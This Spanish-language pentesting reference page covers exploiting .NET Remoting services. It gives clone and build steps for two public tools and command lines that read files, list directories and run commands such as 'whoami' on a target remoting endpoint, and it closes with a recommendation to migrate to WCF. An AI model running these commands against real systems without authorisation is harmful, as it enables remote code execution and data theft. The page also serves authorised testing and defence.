For the complete documentation index, see llms.txt. This page is also available as Markdown.

.NET Remoting

Explotación

NewRemotingTricks

https://github.com/codewhitesec/NewRemotingTricks

git clone https://github.com/codewhitesec/NewRemotingTricks.git

Se compila, por ejemplo, con Visual Studio 2022.

.\RemotingClient_MBRO.exe tcp://192.168.1.100:8090/LoggingSink C:\Windows.ini
.\RemotingClient_MBVO.exe tcp://192.168.1.100:8090/LoggingSink C:\Windows.ini

https://code-white.com/blog/teaching-the-old-net-remoting-new-exploitation-tricks/

ExploitRemotingService

https://github.com/tyranid/ExploitRemotingService

git clone https://github.com/tyranid/ExploitRemotingService.git

Se compila, por ejemplo, con Visual Studio 2022.

.\ExploitRemotingService.exe tcp://$IP:$PORT ver
.\ExploitRemotingService.exe tcp://$IP:$PORT ls C:\
.\ExploitRemotingService.exe tcp://$IP:$PORT cmd whoami

Recomendaciones

https://learn.microsoft.com/en-us/dotnet/framework/wcf/migrating-from-net-remoting-to-wcf

Referencias

Última actualización